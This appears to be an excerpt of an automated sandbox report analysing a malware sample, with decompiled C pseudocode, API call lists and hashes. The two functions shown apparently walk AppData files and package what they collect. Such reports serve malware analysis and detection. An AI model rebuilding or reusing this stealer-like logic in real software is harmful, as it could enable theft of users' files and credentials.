                                                                                                                                                                        • Instruction Fuzzy Hash: F6E1A571A01215AFEF04DFA6DD85EAEBBB9EF49310F004429FA15B7260DBB49910CF64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 26%
                                                                                                                                                                        			E0040A7DA(short* __edx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                        				void* _v40;
                                                                                                                                                                        				void* _v44;
                                                                                                                                                                        				short* _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                        				char _v64;
                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                        				void* _t80;
                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                        				void* _t84;
                                                                                                                                                                        				void* _t88;
                                                                                                                                                                        				void* _t91;
                                                                                                                                                                        				void* _t94;
                                                                                                                                                                        				void* _t116;
                                                                                                                                                                        				void* _t120;
                                                                                                                                                                        				void* _t139;
                                                                                                                                                                        				void* _t145;
                                                                                                                                                                        				void* _t146;
                                                                                                                                                                        				void* _t147;
                                                                                                                                                                        				void* _t149;
                                                                                                                                                                        				void* _t150;
                                                                                                                                                                        				void* _t161;
                                                                                                                                                                        				void* _t162;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				intOrPtr _t164;
                                                                                                                                                                        				char _t206;
                                                                                                                                                                        				void* _t219;
                                                                                                                                                                        				void* _t228;
                                                                                                                                                                        				signed int _t231;
                                                                                                                                                                        				intOrPtr _t232;
                                                                                                                                                                        				void* _t235;
                                                                                                                                                                        				void* _t242;
                                                                                                                                                                        				signed int _t246;
                                                                                                                                                                        				signed int _t249;
                                                                                                                                                                        				void* _t250;
                                                                                                                                                                        				void* _t251;
                                                                                                                                                                        				void* _t253;
                                                                                                                                                                        				void* _t254;
                                                                                                                                                                        
                                                                                                                                                                        				_v48 = __edx;
                                                                                                                                                                        				_v28 = _t164;
                                                                                                                                                                        				_t161 =  *((intOrPtr*)( *0x40e18c))(_t164,  *0x40e2a4);
                                                                                                                                                                        				if(_t161 == 0) {
                                                                                                                                                                        					L24:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t162 = _t161 + 0xa;
                                                                                                                                                                        					_t80 =  *((intOrPtr*)( *0x40e18c))(_t162,  *0x40e1f0);
                                                                                                                                                                        					_t3 = _t80 + 2; // 0x2
                                                                                                                                                                        					_t224 = _t3;
                                                                                                                                                                        					_t81 =  *((intOrPtr*)( *0x40e18c))(_t3,  *0x40e1e8);
                                                                                                                                                                        					_v36 = _t81;
                                                                                                                                                                        					_t84 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t82);
                                                                                                                                                                        					_v8 = _t84;
                                                                                                                                                                        					_t88 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t86);
                                                                                                                                                                        					_v12 = _t88;
                                                                                                                                                                        					_t91 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t89);
                                                                                                                                                                        					_v16 = _t91;
                                                                                                                                                                        					_t94 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t92);
                                                                                                                                                                        					_v20 = _t94;
                                                                                                                                                                        					_t242 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t95);
                                                                                                                                                                        					_t100 = _v36 - _t162 >> 1;
                                                                                                                                                                        					_v24 = _t242;
                                                                                                                                                                        					_v44 = _v36 - _t162 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t162,  &_v8, _t224 - _t162 >> 1, _t100) == 0) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t228 =  *((intOrPtr*)( *0x40e18c))(_v36 + 2,  *0x40e1e8);
                                                                                                                                                                        					_t246 = _t228 - _t162 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t162,  &_v12, _v44 + 1, _t246) == 0) {
                                                                                                                                                                        						L20:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						LocalFree(_v24);
                                                                                                                                                                        						L22:
                                                                                                                                                                        						L23:
                                                                                                                                                                        						goto L24;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t21 = _t228 + 2; // 0x2
                                                                                                                                                                        					_t116 =  *((intOrPtr*)( *0x40e18c))(_t21,  *0x40e1e8);
                                                                                                                                                                        					_v44 = _t116;
                                                                                                                                                                        					_t23 = _t246 + 1; // 0x1
                                                                                                                                                                        					_t231 = _t116 - _t162 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t162,  &_v16, _t23, _t231) == 0) {
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t120 =  *((intOrPtr*)( *0x40e18c))(_v44 + 2,  *0x40e1e8);
                                                                                                                                                                        					_v44 = _t120;
                                                                                                                                                                        					_t27 = _t231 + 1; // 0x1
                                                                                                                                                                        					_t249 = _t120 - _t162 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t162,  &_v20, _t27, _t249) == 0) {
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t232 =  *((intOrPtr*)( *0x40e18c))(_v44 + 2,  *0x40e228);
                                                                                                                                                                        					_v56 = _t232;
                                                                                                                                                                        					_t32 = _t249 + 1; // 0x1
                                                                                                                                                                        					if(E0040A3E4(_t162,  &_v24, _t32, _t232 - _t162 >> 1) == 0) {
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t250 =  *((intOrPtr*)( *0x40e074))(_v12);
                                                                                                                                                                        					if(_t250 > 0) {
                                                                                                                                                                        						_t163 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(_t250);
                                                                                                                                                                        						_push(_t163);
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						if( *((intOrPtr*)( *0x40e0c4))() != 0) {
                                                                                                                                                                        							_t139 =  *((intOrPtr*)( *0x40e000))(_t163, _t163, _v16);
                                                                                                                                                                        							_v36 = _v36 & 0x00000000;
                                                                                                                                                                        							_t163 = _t139;
                                                                                                                                                                        							_v32 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
                                                                                                                                                                        							E0040B177(_v8, _t163, _t163, _v20, _v24, _t141,  &_v36);
                                                                                                                                                                        							_t254 = _t254 + 0x14;
                                                                                                                                                                        							if(_v36 <= 0) {
                                                                                                                                                                        								_t251 = _v32;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t145 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t146 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t219 = 0x10;
                                                                                                                                                                        								_t147 = E0040A05F(_t145, _t219);
                                                                                                                                                                        								_t253 = _t147;
                                                                                                                                                                        								_v52 = _t253;
                                                                                                                                                                        								_t149 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t146,  *0x40e210), _t253);
                                                                                                                                                                        								_t206 =  *0x40e204; // 0x6587d8
                                                                                                                                                                        								_v60 = _v60 & 0x00000000;
                                                                                                                                                                        								_v64 = _t206;
                                                                                                                                                                        								_v44 = _t149;
                                                                                                                                                                        								_t150 = E00408619( &_v44);
                                                                                                                                                                        								_v40 = _t150;
                                                                                                                                                                        								_t235 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        								 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t253, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        								if(0 == 0) {
                                                                                                                                                                        									_t251 = _v32;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t253, 0xffffffff, _t235, 0, 0, 0);
                                                                                                                                                                        									_t251 = _v32;
                                                                                                                                                                        									if(0 != 0) {
                                                                                                                                                                        										E00407EDB(_v48, _t235, 0, 0, _v36, _t251, _v40,  &_v64);
                                                                                                                                                                        										_t254 = _t254 + 0x18;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_t235);
                                                                                                                                                                        								LocalFree(_v40);
                                                                                                                                                                        								LocalFree(_v44);
                                                                                                                                                                        								LocalFree(_v52);
                                                                                                                                                                        								_t232 = _v56;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_t251);
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_t163);
                                                                                                                                                                        					}
                                                                                                                                                                        					LocalFree(_v8);
                                                                                                                                                                        					LocalFree(_v12);
                                                                                                                                                                        					LocalFree(_v16);
                                                                                                                                                                        					LocalFree(_v20);
                                                                                                                                                                        					LocalFree(_v24);
                                                                                                                                                                        					_t66 = _t232 + 2; // 0x2
                                                                                                                                                                        					_t161 =  *((intOrPtr*)( *0x40e18c))(_t66,  *0x40e2a4);
                                                                                                                                                                        					if(_t161 != 0) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L23;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				LocalFree(_v8);
                                                                                                                                                                        				LocalFree(_v12);
                                                                                                                                                                        				LocalFree(_v16);
                                                                                                                                                                        				LocalFree(_v20);
                                                                                                                                                                        				LocalFree(_t242);
                                                                                                                                                                        				goto L22;
                                                                                                                                                                        			}


















































                                                                                                                                                                        0x0040a7ec
                                                                                                                                                                        0x0040a7f0
                                                                                                                                                                        0x0040a7f5
                                                                                                                                                                        0x0040a7f9
                                                                                                                                                                        0x0040abd3
                                                                                                                                                                        0x0040abd7
                                                                                                                                                                        0x0040abd7
                                                                                                                                                                        0x0040a801
                                                                                                                                                                        0x0040a80c
                                                                                                                                                                        0x0040a810
                                                                                                                                                                        0x0040a81e
                                                                                                                                                                        0x0040a81e
                                                                                                                                                                        0x0040a822
                                                                                                                                                                        0x0040a833
                                                                                                                                                                        0x0040a83d
                                                                                                                                                                        0x0040a848
                                                                                                                                                                        0x0040a857
                                                                                                                                                                        0x0040a868
                                                                                                                                                                        0x0040a872
                                                                                                                                                                        0x0040a883
                                                                                                                                                                        0x0040a88d
                                                                                                                                                                        0x0040a89e
                                                                                                                                                                        0x0040a8aa
                                                                                                                                                                        0x0040a8b8
                                                                                                                                                                        0x0040a8be
                                                                                                                                                                        0x0040a8c1
                                                                                                                                                                        0x0040a8cd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a8ee
                                                                                                                                                                        0x0040a8f4
                                                                                                                                                                        0x0040a904
                                                                                                                                                                        0x0040ab7d
                                                                                                                                                                        0x0040ab80
                                                                                                                                                                        0x0040ab89
                                                                                                                                                                        0x0040ab92
                                                                                                                                                                        0x0040ab9b
                                                                                                                                                                        0x0040abcb
                                                                                                                                                                        0x0040abcb
                                                                                                                                                                        0x0040abd1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040abd2
                                                                                                                                                                        0x0040a916
                                                                                                                                                                        0x0040a91a
                                                                                                                                                                        0x0040a91e
                                                                                                                                                                        0x0040a923
                                                                                                                                                                        0x0040a926
                                                                                                                                                                        0x0040a938
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a951
                                                                                                                                                                        0x0040a955
                                                                                                                                                                        0x0040a95a
                                                                                                                                                                        0x0040a95d
                                                                                                                                                                        0x0040a96f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a98a
                                                                                                                                                                        0x0040a991
                                                                                                                                                                        0x0040a999
                                                                                                                                                                        0x0040a9a8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a9b8
                                                                                                                                                                        0x0040a9bc
                                                                                                                                                                        0x0040a9d7
                                                                                                                                                                        0x0040a9d9
                                                                                                                                                                        0x0040a9db
                                                                                                                                                                        0x0040a9dc
                                                                                                                                                                        0x0040a9dd
                                                                                                                                                                        0x0040a9e3
                                                                                                                                                                        0x0040a9f3
                                                                                                                                                                        0x0040a9f5
                                                                                                                                                                        0x0040a9f9
                                                                                                                                                                        0x0040aa0c
                                                                                                                                                                        0x0040aa1d
                                                                                                                                                                        0x0040aa22
                                                                                                                                                                        0x0040aa29
                                                                                                                                                                        0x0040ab21
                                                                                                                                                                        0x0040aa2f
                                                                                                                                                                        0x0040aa3c
                                                                                                                                                                        0x0040aa49
                                                                                                                                                                        0x0040aa4d
                                                                                                                                                                        0x0040aa52
                                                                                                                                                                        0x0040aa63
                                                                                                                                                                        0x0040aa66
                                                                                                                                                                        0x0040aa6f
                                                                                                                                                                        0x0040aa74
                                                                                                                                                                        0x0040aa7a
                                                                                                                                                                        0x0040aa7e
                                                                                                                                                                        0x0040aa84
                                                                                                                                                                        0x0040aa87
                                                                                                                                                                        0x0040aa99
                                                                                                                                                                        0x0040aaa4
                                                                                                                                                                        0x0040aab5
                                                                                                                                                                        0x0040aab9
                                                                                                                                                                        0x0040aaf7
                                                                                                                                                                        0x0040aabb
                                                                                                                                                                        0x0040aad0
                                                                                                                                                                        0x0040aad2
                                                                                                                                                                        0x0040aad7
                                                                                                                                                                        0x0040aaed
                                                                                                                                                                        0x0040aaf2
                                                                                                                                                                        0x0040aaf2
                                                                                                                                                                        0x0040aad7
                                                                                                                                                                        0x0040aafb
                                                                                                                                                                        0x0040ab04
                                                                                                                                                                        0x0040ab0d
                                                                                                                                                                        0x0040ab16
                                                                                                                                                                        0x0040ab1c
                                                                                                                                                                        0x0040ab1c
                                                                                                                                                                        0x0040ab25
                                                                                                                                                                        0x0040ab25
                                                                                                                                                                        0x0040ab2c
                                                                                                                                                                        0x0040ab2c
                                                                                                                                                                        0x0040ab35
                                                                                                                                                                        0x0040ab3e
                                                                                                                                                                        0x0040ab47
                                                                                                                                                                        0x0040ab50
                                                                                                                                                                        0x0040ab59
                                                                                                                                                                        0x0040ab6b
                                                                                                                                                                        0x0040ab71
                                                                                                                                                                        0x0040ab75
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ab7b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ab7b
                                                                                                                                                                        0x0040ab75
                                                                                                                                                                        0x0040aba9
                                                                                                                                                                        0x0040abb2
                                                                                                                                                                        0x0040abbb
                                                                                                                                                                        0x0040abc4
                                                                                                                                                                        0x0040abcb
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A83D
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A857
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A872
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A88D
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A8A8
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB2C
                                                                                                                                                                          • Part of subcall function 0040B177: LocalFree.KERNEL32(00000000), ref: 0040B25D
                                                                                                                                                                          • Part of subcall function 0040B177: LocalFree.KERNEL32(?), ref: 0040B4D9
                                                                                                                                                                          • Part of subcall function 0040B177: FindClose.KERNEL32(00000000), ref: 0040B4E0
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040AB25
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040AAFB
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040AB04
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040AB0D
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040AB16
                                                                                                                                                                        • LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB35
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB3E
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB47
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB50
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB59
                                                                                                                                                                        • LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB80
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB89
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB92
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB9B
                                                                                                                                                                        • LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABA9
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABB2
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABBB
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABC4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABCB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$Alloc$lstrlen$CloseFindGlobal
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2275475116-1731603023
                                                                                                                                                                        • Opcode ID: 396c3cc9efd4a9f6a2a8ad3e428ea3bae641bf45c8fb29a5b1716293b6aaf1ac
                                                                                                                                                                        • Instruction ID: f9c1c7988c740e23ec6b3556d7cabdce8ac8e299f89005d849d6ceee94cacba7
                                                                                                                                                                        • Opcode Fuzzy Hash: 396c3cc9efd4a9f6a2a8ad3e428ea3bae641bf45c8fb29a5b1716293b6aaf1ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 2DC18772900215AFDF089FA6DE45EAE7BB5EF48310F044539F905B72A0DB746D20CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                        			E00404F7E(void* __ecx, short* __edx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                        				short* _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				signed int _v52;
                                                                                                                                                                        				char _v56;
                                                                                                                                                                        				signed int _t60;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				void* _t71;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				void* _t85;
                                                                                                                                                                        				void* _t94;
                                                                                                                                                                        				signed int _t103;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				void* _t111;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				void* _t115;
                                                                                                                                                                        				char _t116;
                                                                                                                                                                        				void* _t117;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				void* _t140;
                                                                                                                                                                        				signed int _t142;
                                                                                                                                                                        				void* _t144;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				void* _t165;
                                                                                                                                                                        				void* _t173;
                                                                                                                                                                        				signed int _t177;
                                                                                                                                                                        				void* _t178;
                                                                                                                                                                        				void* _t180;
                                                                                                                                                                        				void* _t182;
                                                                                                                                                                        				void* _t184;
                                                                                                                                                                        				void* _t187;
                                                                                                                                                                        				void* _t188;
                                                                                                                                                                        				signed int _t193;
                                                                                                                                                                        				signed int _t197;
                                                                                                                                                                        				void* _t199;
                                                                                                                                                                        				void* _t202;
                                                                                                                                                                        
                                                                                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                                                                                        				_t142 = 0;
                                                                                                                                                                        				_v44 = __edx;
                                                                                                                                                                        				_v40 = _v40 & 0;
                                                                                                                                                                        				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e39c);
                                                                                                                                                                        				_t177 = _t60;
                                                                                                                                                                        				if(_t177 == 0) {
                                                                                                                                                                        					return _t60 | 0xffffffff;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t178 = _t177 + 0xc;
                                                                                                                                                                        				_t62 =  *((intOrPtr*)( *0x40e18c))(_t178,  *0x40e1f0);
                                                                                                                                                                        				if(_t62 == 0) {
                                                                                                                                                                        					L5:
                                                                                                                                                                        					_v8 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t178, _t188) + _t64);
                                                                                                                                                                        					if(E0040A3E4(_t178,  &_v8, 0, _t142) != 0) {
                                                                                                                                                                        						_t180 = _t178 + _t142 * 2 + 2;
                                                                                                                                                                        						_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t180) + _t69);
                                                                                                                                                                        						_v12 = _t71;
                                                                                                                                                                        						_t193 =  *((intOrPtr*)( *0x40e18c))(_t180,  *0x40e20c) - _t180 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_t180,  &_v12, 0, _t193) != 0) {
                                                                                                                                                                        							_t182 = _t180 + _t193 * 2 + 2;
                                                                                                                                                                        							_t78 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t182) + _t76);
                                                                                                                                                                        							_v16 = _t78;
                                                                                                                                                                        							_t197 =  *((intOrPtr*)( *0x40e18c))(_t182,  *0x40e20c) - _t182 >> 1;
                                                                                                                                                                        							if(E0040A3E4(_t182,  &_v16, 0, _t197) != 0) {
                                                                                                                                                                        								_t184 = _t182 + _t197 * 2 + 2;
                                                                                                                                                                        								_t85 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t184) + _t83);
                                                                                                                                                                        								_push( *0x40e228);
                                                                                                                                                                        								_v20 = _t85;
                                                                                                                                                                        								_push(_t184);
                                                                                                                                                                        								if(E0040A3E4(_t184,  &_v20, 0,  *((intOrPtr*)( *0x40e18c))() - _t184 >> 1) != 0) {
                                                                                                                                                                        									_t199 =  *((intOrPtr*)( *0x40e044))(0x40, 0x4000);
                                                                                                                                                                        									_v28 = _t199;
                                                                                                                                                                        									_t94 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        									_push(0);
                                                                                                                                                                        									_t144 = _t94;
                                                                                                                                                                        									_push(0x1a);
                                                                                                                                                                        									_push(_t144);
                                                                                                                                                                        									_push(0);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e0c4))() != 0) {
                                                                                                                                                                        										_push(_v12);
                                                                                                                                                                        										_push(_t144);
                                                                                                                                                                        										_push(_t144);
                                                                                                                                                                        										if( *((intOrPtr*)( *0x40e000))() != 0) {
                                                                                                                                                                        											_v40 = 1;
                                                                                                                                                                        											E004052DA(_t144, _t144, _v8, _v16, _v20, _t199,  &_v24);
                                                                                                                                                                        											if(_v24 > 0) {
                                                                                                                                                                        												_t109 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        												_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        												_t173 = 0x10;
                                                                                                                                                                        												_t112 = E0040A05F(_t109, _t173);
                                                                                                                                                                        												_t202 = _t112;
                                                                                                                                                                        												_v48 = _t202;
                                                                                                                                                                        												_t115 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t111,  *0x40e210), _t202);
                                                                                                                                                                        												_v52 = _v52 & 0x00000000;
                                                                                                                                                                        												_v36 = _t115;
                                                                                                                                                                        												_t116 =  *0x40e204; // 0x6587d8
                                                                                                                                                                        												_v56 = _t116;
                                                                                                                                                                        												_t117 = E00408619( &_v36);
                                                                                                                                                                        												_v32 = _t117;
                                                                                                                                                                        												_t187 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        												_t165 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        												if(_t165 == 0) {
                                                                                                                                                                        													_t199 = _v28;
                                                                                                                                                                        												} else {
                                                                                                                                                                        													_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, _t187, _t165, 0, 0);
                                                                                                                                                                        													_t199 = _v28;
                                                                                                                                                                        													if(_t127 != 0) {
                                                                                                                                                                        														E00407EDB(_v44, _t187, 0, 0, _v24, _t199, _v32,  &_v56);
                                                                                                                                                                        													}
                                                                                                                                                                        												}
                                                                                                                                                                        												LocalFree(_t187);
                                                                                                                                                                        												LocalFree(_v32);
                                                                                                                                                                        												LocalFree(_v36);
                                                                                                                                                                        												LocalFree(_v48);
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_v8);
                                                                                                                                                                        									LocalFree(_v12);
                                                                                                                                                                        									LocalFree(_v16);
                                                                                                                                                                        									LocalFree(_v20);
                                                                                                                                                                        									LocalFree(_t144);
                                                                                                                                                                        									LocalFree(_t199);
                                                                                                                                                                        									_t103 = _v40;
                                                                                                                                                                        									L23:
                                                                                                                                                                        									return _t103;
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								LocalFree(_v16);
                                                                                                                                                                        								LocalFree(_v20);
                                                                                                                                                                        								_push(0xfffffffa);
                                                                                                                                                                        								L13:
                                                                                                                                                                        								_pop(_t103);
                                                                                                                                                                        								goto L23;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_v8);
                                                                                                                                                                        							LocalFree(_v12);
                                                                                                                                                                        							LocalFree(_v16);
                                                                                                                                                                        							_push(0xfffffffb);
                                                                                                                                                                        							goto L13;
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						_push(0xfffffffc);
                                                                                                                                                                        						goto L13;
                                                                                                                                                                        					}
                                                                                                                                                                        					LocalFree(_v8);
                                                                                                                                                                        					_push(0xfffffffd);
                                                                                                                                                                        					goto L13;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t146 = _t62 - _t178;
                                                                                                                                                                        					_t142 = _t146 >> 1;
                                                                                                                                                                        					if(_t146 >= 0) {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t140 = 0xfffffffe;
                                                                                                                                                                        					return _t140;
                                                                                                                                                                        				}
                                                                                                                                                                        			}















































                                                                                                                                                                        0x00404f89
                                                                                                                                                                        0x00404f95
                                                                                                                                                                        0x00404f97
                                                                                                                                                                        0x00404f9a
                                                                                                                                                                        0x00404f9e
                                                                                                                                                                        0x00404fa0
                                                                                                                                                                        0x00404fa4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00404fa6
                                                                                                                                                                        0x00404fb9
                                                                                                                                                                        0x00404fbd
                                                                                                                                                                        0x00404fc1
                                                                                                                                                                        0x00404fd3
                                                                                                                                                                        0x00404fef
                                                                                                                                                                        0x00404ffd
                                                                                                                                                                        0x0040501d
                                                                                                                                                                        0x00405028
                                                                                                                                                                        0x00405030
                                                                                                                                                                        0x00405044
